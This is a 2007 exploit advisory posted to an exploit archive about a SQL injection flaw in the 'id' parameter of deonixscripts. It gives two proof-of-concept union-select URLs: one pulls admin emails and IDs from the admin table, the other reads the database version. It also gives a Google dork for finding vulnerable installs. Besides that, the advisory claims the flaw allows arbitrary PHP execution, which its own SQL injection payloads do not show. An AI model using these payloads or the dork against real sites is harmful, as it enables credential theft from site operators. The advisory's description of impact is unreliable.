Home / exploits deonix-sql.txt
Posted on 05 October 2007
#############################Nyubicrew Community################################ # # deonixscripts (id) Remote Sql Injection # # vendor : http://www.deonixscripts.com/ # Demo : http://www.deonixscripts.com/demo/tplmgt13/ # ################################################################################# # # # Bug Found By :home_edition2001 a.k.a (bius) (31-08-2007) # # contact: bius22@mac.com # # Website : www.solpotcrew.org/adv/home_edition2001-adv-03.txt # ################################################################################ # # # Greetz: Nyubi aka solpot , Matdhule , S4M3K ,[DEVIL_MAY_CRY] , iFX , Scr3W_W0rM , # nakkuta , bukan-diriku , POET , Th0nk , mbako_semprul , Fungky , airsoul # wong_edan , ^s0n_g0ku^ , aLiiF , sparta-x , dudut , xtremeshell , Bithedz # th3sn0wbr4in , ReAksi , X8 , junkiest , K1tk4t , masboi , saritem # x-ace , replacement_killer , LamerCrew , k1n9k0ng ,[K]ompoR_Meledu[K] # and all member #nyubicrew @ irc.mildnet.org # especially thx to str0ke @ milw0rm.com # ############################################################################### Input passed to the "id" is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by Remote Sql Injection P.O.C : http://localhost/index.php?action=readmore&id=-1%20union%20select%200,1,concat(email,0x3a,userid,0x3a,adminid),3%20from%20admin/* http://localhost/index.php?action=readmore&id=-1%20union%20select%200,1,@@version,3/* Google Dork : Powered by: deonixscripts.com ######################MY Special Girl JUST FOR U Ula######################### ######################################E.O.F##################################